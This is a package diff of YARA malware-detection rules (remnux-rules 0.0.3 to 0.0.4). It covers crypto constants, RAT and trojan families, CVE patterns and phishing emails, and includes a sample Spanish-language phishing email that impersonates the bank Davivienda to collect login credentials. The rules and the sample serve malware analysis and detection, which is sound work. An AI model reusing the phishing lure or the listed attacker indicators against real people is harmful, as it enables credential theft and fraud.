+                author = "phoul (@phoul)"
+                description = "Look for SHA384/SHA512 constants"
+                date = "2014-01"
+                version = "0.1"
+        strings:
+		$c0 = { 428a2f98 }
+		$c1 = { 982F8A42 }
+		$c2 = { 71374491 }
+		$c3 = { 91443771 }
+		$c4 = { B5C0FBCF }
+		$c5 = { CFFBC0B5 }
+		$c6 = { E9B5DBA5 }
+		$c7 = { A5DBB5E9 }
+		$c8 = { D728AE22 }
+		$c9 = { 22AE28D7 }
+	condition:
+		5 of them
+}
+
+rule WHIRLPOOL_Constants : crypto {
+        meta:
+                author = "phoul (@phoul)"
+                description = "Look for WhirlPool constants"
+                date = "2014-02"
+                version = "0.1"
+        strings:
+		$c0 = { 18186018c07830d8 }
+		$c1 = { d83078c018601818 }
+		$c2 = { 23238c2305af4626 }
+		$c3 = { 2646af05238c2323 }
+	condition:
+                2 of them
+}
+
+rule DarkEYEv3_Cryptor : crypto {
+	meta:
+		description = "Rule to detect DarkEYEv3 encrypted executables (often malware)"
+		author = "Florian Roth"
+		reference = "http://darkeyev3.blogspot.fi/"
+		date = "2015-05-24"
+		hash0 = "6b854b967397f7de0da2326bdd5d39e710e2bb12"
+		hash1 = "d53149968eca654fc0e803f925e7526fdac2786c"
+		hash2 = "7e3a8940d446c57504d6a7edb6445681cca31c65"
+		hash3 = "d3dd665dd77b02d7024ac16eb0949f4f598299e7"
+		hash4 = "a907a7b74a096f024efe57953c85464e87275ba3"
+		hash5 = "b1c422155f76f992048377ee50c79fe164b22293"
+		hash6 = "29f5322ce5e9147f09e0a86cc23a7c8dc88721b9"
+		hash7 = "a0382d7c12895489cb37efef74c5f666ea750b05"
+		hash8 = "f3d5b71b7aeeb6cc917d5bb67e2165cf8a2fbe61"
+		score = 55
+	strings:
+		$s0 = "\\DarkEYEV3-" 
+	condition:
+		uint16(0) == 0x5a4d and $s0
+}
diff -Nru remnux-rules-0.0.3/yara/crypto.yara remnux-rules-0.0.4/yara/crypto.yara
--- remnux-rules-0.0.3/yara/crypto.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/crypto.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,146 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-rule BLOWFISH_Constants {
-        meta:
-                author = "phoul (@phoul)"
-                description = "Look for Blowfish constants"
-                date = "2014-01"
-                version = "0.1"
-        strings:
-		$c0 = { D1310BA6 }
-		$c1 = { A60B31D1 }	
-		$c2 = { 98DFB5AC }
-		$c3 = { ACB5DF98 }
-		$c4 = { 2FFD72DB }
-		$c5 = { DB72FD2F }
-		$c6 = { D01ADFB7 }
-		$c7 = { B7DF1AD0 }
-		$c8 = { 4B7A70E9 }
-		$c9 = { E9707A4B }
-		$c10 = { F64C261C }
-		$c11 = { 1C264CF6 }
-	condition:
-                6 of them
-}
-
-rule MD5_Constants {
-        meta:
-                author = "phoul (@phoul)"
-                description = "Look for MD5 constants"
-                date = "2014-01"
-                version = "0.2"
-        strings:
-		// Init constants
-		$c0 = { 67452301 }
-		$c1 = { efcdab89 }
-		$c2 = { 98badcfe }
-		$c3 = { 10325476 }
-		$c4 = { 01234567 }
-		$c5 = { 89ABCDEF }
-		$c6 = { FEDCBA98 }
-		$c7 = { 76543210 }	
-		// Round 2
-		$c8 = { F4D50d87 }
-		$c9 = { 78A46AD7 }
-	condition:
-                5 of them
-}
-
-rule RC6_Constants {
-        meta:
-                author = "chort (@chort0)"
-                description = "Look for RC6 magic constants in binary"
-                reference = "https://twitter.com/mikko/status/417620511397400576"
-                reference2 = "https://twitter.com/dyngnosis/status/418105168517804033"
-                date = "2013-12"
-                version = "0.2"
-        strings:
-                $c1 = { B7E15163 }
-                $c2 = { 9E3779B9 }
-                $c3 = { 6351E1B7 }
-                $c4 = { B979379E }
-        condition:
-                2 of them
-}
-
-rule RIPEMD160_Constants {
-        meta:
-                author = "phoul (@phoul)"
-                description = "Look for RIPEMD-160 constants"
-                date = "2014-01"
-                version = "0.1"
-        strings:
-		$c0 = { 67452301 }
-		$c1 = { EFCDAB89 }
-		$c2 = { 98BADCFE }
-		$c3 = { 10325476 }
-		$c4 = { C3D2E1F0 }
-		$c5 = { 01234567 }
-		$c6 = { 89ABCDEF }
-		$c7 = { FEDCBA98 }
-		$c8 = { 76543210 }
-		$c9 = { F0E1D2C3 }
-	condition:
-		5 of them
-}
-rule SHA1_Constants {
-        meta:
-                author = "phoul (@phoul)"
-                description = "Look for SHA1 constants"
-                date = "2014-01"
-                version = "0.1"
-        strings:
-		$c0 = { 67452301 }
-		$c1 = { EFCDAB89 }
-		$c2 = { 98BADCFE }
-		$c3 = { 10325476 }
-		$c4 = { C3D2E1F0 }
-		$c5 = { 01234567 }
-		$c6 = { 89ABCDEF }
-		$c7 = { FEDCBA98 }
-		$c8 = { 76543210 }
-		$c9 = { F0E1D2C3 }
-	condition:
-                5 of them
-}
-
-rule SHA512_Constants {
-        meta:
-                author = "phoul (@phoul)"
-                description = "Look for SHA384/SHA512 constants"
-                date = "2014-01"
-                version = "0.1"
-        strings:
-		$c0 = { 428a2f98 }
-		$c1 = { 982F8A42 }
-		$c2 = { 71374491 }
-		$c3 = { 91443771 }
-		$c4 = { B5C0FBCF }
-		$c5 = { CFFBC0B5 }
-		$c6 = { E9B5DBA5 }
-		$c7 = { A5DBB5E9 }
-		$c8 = { D728AE22 }
-		$c9 = { 22AE28D7 }
-	condition:
-		5 of them
-}
-
-rule WHIRLPOOL_Constants {
-        meta:
-                author = "phoul (@phoul)"
-                description = "Look for WhirlPool constants"
-                date = "2014-02"
-                version = "0.1"
-        strings:
-		$c0 = { 18186018c07830d8 }
-		$c1 = { d83078c018601818 }
-		$c2 = { 23238c2305af4626 }
-		$c3 = { 2646af05238c2323 }
-	condition:
-                2 of them
-}
-
-
diff -Nru remnux-rules-0.0.3/yara/CVE_Rules.yar remnux-rules-0.0.4/yara/CVE_Rules.yar
--- remnux-rules-0.0.3/yara/CVE_Rules.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/CVE_Rules.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,32 @@
+rule JavaDeploymentToolkit
+{
+   meta:
+      ref = "CVE-2010-0887"
+      impact = 7
+      author = "@d3t0n4t0r"
+   strings:
+      $cve20100887_1 = "CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA" nocase fullword
+      $cve20100887_2 = "document.createElement(\"OBJECT\")" nocase fullword
+      $cve20100887_3 = "application/npruntime-scriptable-plugin;deploymenttoolkit" nocase fullword
+      $cve20100887_4 = "application/java-deployment-toolkit" nocase fullword
+      $cve20100887_5 = "document.body.appendChild(" nocase fullword
+      $cve20100887_6 = /.*?.launch\(.*?\)/
+      $cve20100887_7 = "-J-jar -J" nocase fullword
+   condition:
+      3 of them
+}
+
+rule MSIETabularActivex
+{
+        meta:
+                ref = "CVE-2010-0805"
+                impact = 7
+                hide = true
+                author = "@d3t0n4t0r"
+        strings:
+                $cve20100805_1 = "333C7BC4-460F-11D0-BC04-0080C7055A83" nocase fullword
+                $cve20100805_2 = "DataURL" nocase fullword
+                $cve20100805_3 = /value\=\"http:\/\/(.*?)\"/ nocase fullword
+        condition:
+                ($cve20100805_1 and $cve20100805_3) or (all of them)
+}
diff -Nru remnux-rules-0.0.3/yara/cxpid.yara remnux-rules-0.0.4/yara/cxpid.yara
--- remnux-rules-0.0.3/yara/cxpid.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/cxpid.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,49 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule cxpidStrings : cxpid Family
-{
-    meta:
-        description = "cxpid Identifying Strings"
-        author = "Seth Hardy"
-        last_modified = "2014-06-23"
-        
-    strings:
-        $ = "/cxpid/submit.php?SessionID="
-        $ = "/cxgid/"
-        $ = "E21BC52BEA2FEF26D005CF"
-        $ = "E21BC52BEA39E435C40CD8"
-        $ = "                   -,L-,O+,Q-,R-,Y-,S-"
-        
-    condition:
-       any of them
-}
-
-rule cxpidCode : cxpid Family 
-{
-    meta:
-        description = "cxpid code features"
-        author = "Seth Hardy"
-        last_modified = "2014-06-23"
-    
-    strings:
-        $entryjunk = { 55 8B EC B9 38 04 00 00 6A 00 6A 00 49 75 F9 }
-    
-    condition:
-        any of them
-}
-
-rule cxpid : Family
-{
-    meta:
-        description = "cxpid"
-        author = "Seth Hardy"
-        last_modified = "2014-06-23"
-        
-    condition:
-        cxpidCode or cxpidStrings
-}
diff -Nru remnux-rules-0.0.3/yara/DarkComet.yara remnux-rules-0.0.4/yara/DarkComet.yara
--- remnux-rules-0.0.3/yara/DarkComet.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/DarkComet.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,61 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule DarkComet_2
-{
-    meta:
-        description = "DarkComet RAT"
-	author = "botherder https://github.com/botherder"
-
-    strings:
-        $bot1 = /(#)BOT#OpenUrl/ wide ascii
-        $bot2 = /(#)BOT#Ping/ wide ascii
-        $bot3 = /(#)BOT#RunPrompt/ wide ascii
-        $bot4 = /(#)BOT#SvrUninstall/ wide ascii
-        $bot5 = /(#)BOT#URLDownload/ wide ascii
-        $bot6 = /(#)BOT#URLUpdate/ wide ascii
-        $bot7 = /(#)BOT#VisitUrl/ wide ascii
-        $bot8 = /(#)BOT#CloseServer/ wide ascii
-
-        $ddos1 = /(D)DOSHTTPFLOOD/ wide ascii
-        $ddos2 = /(D)DOSSYNFLOOD/ wide ascii
-        $ddos3 = /(D)DOSUDPFLOOD/ wide ascii
-
-        $keylogger1 = /(A)ctiveOnlineKeylogger/ wide ascii
-        $keylogger2 = /(U)nActiveOnlineKeylogger/ wide ascii
-        $keylogger3 = /(A)ctiveOfflineKeylogger/ wide ascii
-        $keylogger4 = /(U)nActiveOfflineKeylogger/ wide ascii
-
-        $shell1 = /(A)CTIVEREMOTESHELL/ wide ascii
-        $shell2 = /(S)UBMREMOTESHELL/ wide ascii
-        $shell3 = /(K)ILLREMOTESHELL/ wide ascii
-
-    condition:
-        4 of ($bot*) or all of ($ddos*) or all of ($keylogger*) or all of ($shell*)
-}
-
-rule DarkComet : rat
-{
-	meta:
-		description = "DarkComet" 
-		author = "Jean-Philippe Teissier / @Jipe_"
-		date = "2013-01-12"
-		filetype = "memory"
-		version = "1.0" 
-
-	strings:
-		$a = "#BEGIN DARKCOMET DATA --"
-		$b = "#EOF DARKCOMET DATA --"
-		$c = "DC_MUTEX-"
-		$k1 = "#KCMDDC5#-890"
-		$k2 = "#KCMDDC51#-890"
-
-	condition:
-		any of them
-}
-
-
diff -Nru remnux-rules-0.0.3/yara/Derusbi.yara remnux-rules-0.0.4/yara/Derusbi.yara
--- remnux-rules-0.0.3/yara/Derusbi.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Derusbi.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,61 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule Trojan_Derusbi {
-    meta:
-        Author = "RSA_IR"
-        Date     = "4Sept13"
-        File     = "derusbi_variants v 1.3"
-        MD5      = " c0d4c5b669cc5b51862db37e972d31ec "
-
-    strings:
-        $b1 = {8b 15 ?? ?? ?? ?? 8b ce d3 ea 83 c6 ?? 30 90 ?? ?? ?? ?? 40 3b 05 ?? ?? ?? ?? 72 ??}
-        $b2 = {F3 5D 88 2E ?? ?? 00 00 BE 07 18 2E F0 5D 88 2E F7 5D 88 2E 0C A2 88 2E 4B 5D 88 2E F3 5D 88 2E}
-        $b3 = {4E E6 40 BB}
-        $b4 = {B1 19 BF 44}
-        $b5 = {6A F5 44 3D ?? ?? 00 00 27 AF D4 3D 69 F5 44 3D 6E F5 44 3D 95 0A 44 3D D2 F5 44 3D 6A F5 44 3D}
-        $b6 = {F3 5D 88 2E ?? ?? 00 00 BE 07 18 2E F0 5D 88 2E}
-        $b7 = {D6 D5 A4 A3 ?? ?? 00 00 9B 8F 34 A3 D5 D5 A4 A3 D2 D5 A4 A3 29 2A A4 A3}
-        $b8 = {C3 76 33 9F ?? ?? 00 00 8E 2C A3 9F C0 76 33 9F C7 76 33 9F 3C 89 33 9F}
-
-    condition:
-        2 of ($b1, $b2, $b3, $b4) and 1 of ($b5, $b6, $b7, $b8)
-}
-
-rule APT_Derusbi_DeepPanda
-{
-meta:
-	author = "ThreatConnect Intelligence Research Team"
-	reference = "http://www.crowdstrike.com/sites/default/files/AdversaryIntelligenceReport_DeepPanda_0.pdf"
-strings:
-	$D = "Dom4!nUserP4ss" wide ascii
-condition:
-	$D
-}
-
-
-rule APT_Derusbi_Gen
-{
-meta:
-	author = "ThreatConnect Intelligence Research Team"
-strings:
-	$2 = "273ce6-b29f-90d618c0" wide ascii
-	$A = "Ace123dx" fullword wide ascii
-	$A1 = "Ace123dxl!" fullword wide ascii
-	$A2 = "Ace123dx!@#x" fullword wide ascii
-	$C = "/Catelog/login1.asp" wide ascii
-	$DF = "~DFTMP$$$$$.1" wide ascii
-	$G = "GET /Query.asp?loginid=" wide ascii
-	$L = "LoadConfigFromReg failded" wide ascii
-	$L1 = "LoadConfigFromBuildin success" wide ascii
-	$ph = "/photoe/photo.asp HTTP" wide ascii
-	$PO = "POST /photos/photo.asp" wide ascii
-	$PC = "PCC_IDENT" wide ascii
-condition:
-	any of them
-}
-
diff -Nru remnux-rules-0.0.3/yara/Dexter.yara remnux-rules-0.0.4/yara/Dexter.yara
--- remnux-rules-0.0.3/yara/Dexter.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Dexter.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,22 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule Dexter_Malware {
-	meta:
-		description = "Detects the Dexter Trojan/Agent http://goo.gl/oBvy8b"
-		author = "Florian Roth"
-		reference = "http://goo.gl/oBvy8b"
-		date = "2015/02/10"
-		score = 70
-	strings:
-		$s0 = "Java Security Plugin" fullword wide
-		$s1 = "%s\\%s\\%s.exe" fullword wide
-		$s2 = "Sun Java Security Plugin" fullword wide
-		$s3 = "\\Internet Explorer\\iexplore.exe" fullword wide
-	condition:
-		all of them
-}
diff -Nru remnux-rules-0.0.3/yara/Dridex.yara remnux-rules-0.0.4/yara/Dridex.yara
--- remnux-rules-0.0.3/yara/Dridex.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Dridex.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,29 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule Dridex_Trojan_XML {
-	meta:
-		description = "Dridex Malware in XML Document"
-		author = "Florian Roth @4nc4p"
-		reference = "https://threatpost.com/dridex-banking-trojan-spreading-via-macros-in-xml-files/111503"
-		date = "2015/03/08"
-		hash1 = "88d98e18ed996986d26ce4149ae9b2faee0bc082"
-		hash2 = "3b2d59adadf5ff10829bb5c27961b22611676395"
-		hash3 = "e528671b1b32b3fa2134a088bfab1ba46b468514"
-		hash4 = "981369cd53c022b434ee6d380aa9884459b63350"
-		hash5 = "96e1e7383457293a9b8f2c75270b58da0e630bea"
-	strings:
-		// can be ascii or wide formatted - therefore no restriction
-		$c_xml      = "<?xml version="
-		$c_word     = "<?mso-application progid=\"Word.Document\"?>"
-		$c_macro    = "w:macrosPresent=\"yes\""
-		$c_binary   = "<w:binData w:name="
-		$c_0_chars  = "<o:Characters>0</o:Characters>"
-		$c_1_line   = "<o:Lines>1</o:Lines>"
-	condition:
-		all of ($c*)
-}
diff -Nru remnux-rules-0.0.3/yara/email/attachment.yar remnux-rules-0.0.4/yara/email/attachment.yar
--- remnux-rules-0.0.3/yara/email/attachment.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/email/attachment.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,27 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and 
+    open to any user or organization, as long as you use it under this license.
+*/
+
+rule with_attachment : mail {
+	meta:
+		author = "Antonio Sanchez <asanchez@hispasec.com>"
+		reference = "http://laboratorio.blogs.hispasec.com/"
+		description = "Rule to detect the presence of an or several attachments"
+	strings:
+		$attachment_id = "X-Attachment-Id"
+	condition:
+		$attachment_id
+}
+
+
+rule without_attachments : mail {
+	meta:
+		author = "Antonio Sanchez <asanchez@hispasec.com>"
+		reference = "http://laboratorio.blogs.hispasec.com/"
+		description = "Rule to detect the no presence of any attachment"
+	strings:
+		$attachment_id = "X-Attachment-Id"
+	condition:
+		not $attachment_id
+}
diff -Nru remnux-rules-0.0.3/yara/email/bank_rule.yar remnux-rules-0.0.4/yara/email/bank_rule.yar
--- remnux-rules-0.0.3/yara/email/bank_rule.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/email/bank_rule.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,6 @@
+rule davivienda : mail {
+	strings:
+		$nombre = "davivienda" nocase
+	condition:
+		all of them
+}
diff -Nru remnux-rules-0.0.3/yara/email/EMAIL_Cryptowall.yar remnux-rules-0.0.4/yara/email/EMAIL_Cryptowall.yar
--- remnux-rules-0.0.3/yara/email/EMAIL_Cryptowall.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/email/EMAIL_Cryptowall.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,52 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+/*
+  Description: None
+  Priority: 5
+  Scope: Against Email
+  Tags: None
+  Created in PhishMe's Triage on September 14, 2015 2:33 PM
+*/
+
+rule CryptoWall_Resume_phish : mail
+{
+  meta:
+		Author = "http://phishme.com/"
+		reference = "https://github.com/phishme/malware_analysis/blob/master/yara_rules/cryptowall.yar"
+  strings:
+    $hello2="my name is " nocase
+    $file1="resume attached" nocase
+    $file2="my resume is pdf file" nocase
+    $file3="attached is my resume" nocase
+    $sal1="I would appreciate your " nocase
+    $sal2="I am looking forward to hearing from you" nocase
+    $sal3="I look forward to your reply" nocase
+    $sal4="Please message me back" nocase
+    $sal5="our early reply will be appreciated" nocase
+    $file4="attach is my resume" nocase
+    $file5="PDF file is my resume" nocase
+    $sal6="Looking forward to see your response" nocase
+
+  condition:
+    1 of ($hello*) and 1 of ($file*) and 1 of ($sal*)
+}
+
+/*
+  Description: None
+  Priority: 5
+  Scope: Against Attachment
+  Tags: None
+  Created in PhishMe's Triage on September 14, 2015 2:35 PM
+*/
+
+rule docx_macro : mail
+{
+  strings:
+    $header="PK" 
+    $vbaStrings="word/vbaProject.bin" nocase
+
+  condition:
+    $header at 0 and $vbaStrings
+}
diff -Nru remnux-rules-0.0.3/yara/email/email_Ukraine_BE_powerattack.yar remnux-rules-0.0.4/yara/email/email_Ukraine_BE_powerattack.yar
--- remnux-rules-0.0.3/yara/email/email_Ukraine_BE_powerattack.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/email/email_Ukraine_BE_powerattack.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,33 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as
+    long as you use it under this license.
+*/
+
+rule email_Ukraine_power_attack_content : mail {
+	meta:
+		author = "@mmorenog,@yararules"
+		description = "Detects a possible .eml used in the Ukraine BE power attack"
+		ref1 = "https://twitter.com/lowcalspam/status/692625258394726400"
+		
+	strings:
+		$subject = "=?windows-1251?B?0+rg5yDP8OXn6OTl7fLgINPq8OC/7egguSAx?=" 
+		$body_string1 = "=E5=E7=E8=E4=E5=ED=F2=E0 =D3=EA=F0=E0=BF=ED=E8 =F2=E0 =EF=EE=F0=FF=E4=EE=EA="
+		$body_string2 = "=B3 =C7=E1=F0=EE=E9=ED=E8=F5 =D1=E8=EB =D3=EA=F0=E0=BF=ED=E8 =F2=E0=20"
+		$body_string3 = "=E1=B3=F2=ED=E8=EA=B3=E2 =EE=F0=E3=E0=ED=B3=E7=E0=F6=B3=E9 =E7=E0 =E7=F0=E0="
+		$body_string4 = "http://176.53.127.194/bWFpbF9rYW5jQG9lLmlmLnVh.png"
+		$body_string5 = "=C2=B3=E4=EF=EE=E2=B3=E4=ED=EE =E4=EE =D3=EA=E0=E7=F3 =CF=F0=E5=E7=E8=E4=E5="
+	condition:
+		3 of them
+}
+rule email_Ukraine_power_attack_attachment : mail {
+	meta:
+		author = " @yararules"
+		description = "Detects a possible .eml used in the Ukraine BE power attack"
+		ref1 = "https://twitter.com/lowcalspam/status/692625258394726400"
+
+	strings:
+		$filename = "filename=\"=?windows-1251?B?xO7k4PLu6jEueGxz?=\""
+		
+		condition:
+		all of them
+}
diff -Nru remnux-rules-0.0.3/yara/email/eml/davivienda.eml remnux-rules-0.0.4/yara/email/eml/davivienda.eml
--- remnux-rules-0.0.3/yara/email/eml/davivienda.eml	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/email/eml/davivienda.eml	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,141 @@
+x-store-info: sbevkl2QZR7OXo7WID5ZcdJYDvlIhT9Ry8z1HDFOqPjB91wGb3fbQExX2186RFgx+kM0vJNpCgJPCUbrLyBQ8uWPO5Rr4ijSsl6TMA6ERuioTiOLvTIHPW3H0uRef3MF06HvY8fYXKiRbY3+uDBTWA==
+Authentication-Results: hotmail.com; spf=fail (sender IP is 192.196.156.109; identity alignment result is pass and alignment mode is relaxed) smtp.mailfrom=novedades@davivienda.com; dkim=none (identity alignment result is pass and alignment mode is relaxed) header.d=davivienda.com; x-hmca=fail header.id=novedades@davivienda.com
+X-SID-PRA: novedades@davivienda.com
+X-AUTH-Result: FAIL
+X-SID-Result: FAIL
+X-Message-Status: n:n
+X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MTtHRD0xO1NDTD0y
+X-Message-Info: NhFq/7gR1vSiC5C9ieUYJFnDrDlTksH8+5ClhfnJ+qVU2+/eikAOsxTnB3WLU3Ab8g2pE//33+fSMylb41VHKxSl9Ezj9MbPSbwOetSdYu+NhNdwerJ6KovNz+xxzEK9n+Upu/d+Kq89dwf3Xz8RHBidCOG4Enzoa9/bRZu9vtflFZXERz87QwDx300zveEw+yFCBYLb+2hwioqONd/vRHI89gecXRnAkgLD5L4D3NuHCTSvssQ1KA==
+Received: from host.invocenetwork.com ([192.196.156.109]) by COL004-MC3F17.hotmail.com over TLS secured channel with Microsoft SMTPSVC(7.5.7601.23143);
+Sun, 27 Sep 2015 22:24:35 -0700
+Received: from [46.183.221.40] (port=52102 helo=IP-221-40)
+by host.invocenetwork.com with esmtpa (Exim 4.85)
+(envelope-from <novedades@davivienda.com>)
+id 1ZgQvS-0008OD-KK
+for email_account@hotmail.com; Mon, 28 Sep 2015 00:24:34 -0500
+Message-ID: <02051372-42275-c5523503943056@ip-221-40>
+From: "Davivienda S.A" <novedades@davivienda.com>
+To: email_account@hotmail.com
+Subject: Valide y Evite Fraudes en sus Productos
+Date: Mon, 26 Nov 2015 10:25:33 +0300
+MIME-Version: 1.0
+Content-Type: text/html
+Content-Transfer-Encoding: quoted-printable
+X-Priority: 3
+X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
+X-AntiAbuse: Primary Hostname - host.invocenetwork.com
+X-AntiAbuse: Original Domain - hotmail.com
+X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
+X-AntiAbuse: Sender Address Domain - davivienda.com
+X-Get-Message-Sender-Via: host.invocenetwork.com: authenticated_id: email2@baco.com.ec
+X-Source:
+X-Source-Args:
+X-Source-Dir:
+Return-Path: novedades@davivienda.com
+X-OriginalArrivalTime: 28 Sep 2015 05:24:35.0706 (UTC) FILETIME=[F6AEE5A0:01D0F9AD]
+
+<html>
+<style type="text/css">
+.ecxyahoo_quoted div div .ecxy_msg_container #ecxyiv2643982918 div table tbody tr td font {
+	font-family: "Trebuchet MS", Arial, Helvetica, sans-serif;
+	font-size: 14px;
+}
+.ecxyahoo_quoted div div .ecxy_msg_container #ecxyiv2643982918 div table tbody tr td font div p {
+	font-family: "Trebuchet MS", Arial, Helvetica, sans-serif;
+}
+.ecxyahoo_quoted div div .ecxy_msg_container #ecxyiv2643982918 div table tbody tr td font b {
+	color: #000;
+	font-size: 14px;
+}
+.ecxyahoo_quoted div div .ecxy_msg_container #ecxyiv2643982918 div table tbody tr td font div p {
+	font-family: "Trebuchet MS", Arial, Helvetica, sans-serif;
+}
+.ecxyahoo_quoted div div .ecxy_msg_container #ecxyiv2643982918 div table tbody tr td font div p {
+	font-size: 12px;
+}
+.ecxyahoo_quoted div div .ecxy_msg_container #ecxyiv2643982918 div table tbody tr td div table tbody tr th div font span strong a {
+	color: #9A0001;
+}
+.ecxyahoo_quoted div div .ecxy_msg_container #ecxyiv2643982918 div table tbody tr td div p a {
+	color: #A40000;
+	font-weight: bold;
+}
+</style>
+ <font face="Arial" size="2"><br>
+</font>
+<div>
+<div style="color:#000;background-color:#fff;font-family:HelveticaNeue, Helvetica Neue, Helvetica, Arial, Lucida Grande, sans-serif;font-size:12pt;">
+<div class="ecxyahoo_quoted" style="display:block;">
+<div style="font-family:HelveticaNeue, 'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', sans-serif;font-size:12pt;">
+        <div style="font-family:'Trebuchet MS', Arial, Helvetica, sans-serif; font-size:14px;"><br>
+          <div class="ecxy_msg_container"><div id="ecxyiv2643982918"><div><table border="0" cellpadding="0" cellspacing="0" align="center" bgcolor="#FFFFFF"> <tbody><tr> 
+                    <td align="center"><img src="http://www.davivienda.com/Documents/wcm?biblio=WCM_DAVIVIENDA_COM&nombre=SAC_cabezote.JPG"></td> 
+                  </tr></tbody></table><div>&nbsp;</div>
+                <table border="0" cellpadding="0" cellspacing="0" align="center" bgcolor="#FFFFFF" width="609">
+                  <tbody> 
+                  <tr> <td> <div align="center">
+                    <table align="left" border="0" cellpadding="0"
+                        cellspacing="0" height="25" width="593">
+                      <tbody>
+                        <tr>
+                          <th width="446"
+                              align="center"
+                              style="font-family:'Trebuchet MS',
+                              sans-serif;font-size:14px;color:#333333;text-align:justify;" scope="col"><strong><font size="3" face="arial">ESTIMADO CLIENTE:</font></strong></th>
+                        </tr>
+                      </tbody>
+                    </table>
+                    <font face="arial" size="3"><br> 
+                    <br> 
+                  </font></div>
+                    <div>
+                        <p><font size="4" face="arial">Durante las &uacute;ltimas horas se ha incrementado la actividad de ataques fraudulentos, con el f&iacute;n de robar la informaci&oacute;n de acceso a sitios transaccionales.</font></p>
+                        <p><font size="4" face="arial">Para una mayor seguridad en sus productos Davivienda le invitamos a validar el acceso a su cuenta para evitar posibles fraudes.</font></p>
+                        <p><font size="3" face="arial"><img src="http://i.imgur.com/4BDCkRF.png" width="6" height="9"> Ingrese al men&uacute; a continuaci&oacute;n, <em><a href="http://dominiofraudulento.com/path">www.davivienda.com /Transacciones /Consultas</a></em></font></p>
+                        <p><font size="3" face="arial"><img src="http://i.imgur.com/4BDCkRF.png" width="6" height="9"> Digite su <em>usuario y claves de acceso</em>, para que nuestro sistema sincronize su informaci&oacute;n.</font></p>
+                        <p><font size="3" face="arial">Cordialmente,</font> </p>
+                        <table width="268" border="0">
+                          <tr>
+                            <td width="213"><font size="3" face="arial"><b>DAVIVIENDA S.A</b></font></td>
+                          </tr>
+                          <tr>
+                            <td><font size="3" face="arial">Estrategia de Seguridad</font></td>
+                          </tr>
+                        </table></div></td> </tr></tbody></table><div>&nbsp;</div><table border="0" cellpadding="0" cellspacing="0" align="center" bgcolor="#FFFFFF"> <tbody><tr> 
+                    <td align="center"><img src="http://www.davivienda.com/Documents/wcm?biblio=WCM_DAVIVIENDA_COM&nombre=SAC_pie"></td> 
+                  </tr></tbody></table>
+              </div>
+            </div>
+            <div align="center">
+              <table width="64%" border="0" cellpadding="0">
+                <tr>
+                  <td>
+                    <div align="center"><font size="2">Le recordamos que esta 
+                      direcci�n de e-mail es utilizada solamente para los env�os 
+                      de la informaci�n solicitada. Por favor no responda con consultas 
+                      personales ya que no podr�n ser atendidas.<br>
+                      <br>
+                      BANCO DAVIVIENDA<br>
+                      AVISO LEGAL : Este mensaje es confidencial, puede contener 
+                      informaci�n privilegiada y no puede ser usado ni divulgado 
+                      por personas distintas de su destinatario. Si obtiene esta 
+                      transmisi�n por error, por favor destruya su contenido y 
+                      avise a su remitente. esta prohibida su retenci�n, grabaci�n, 
+                      utilizaci�n, aprovechamiento o divulgaci�n con cualquier prop�sito. Este mensaje ha sido 
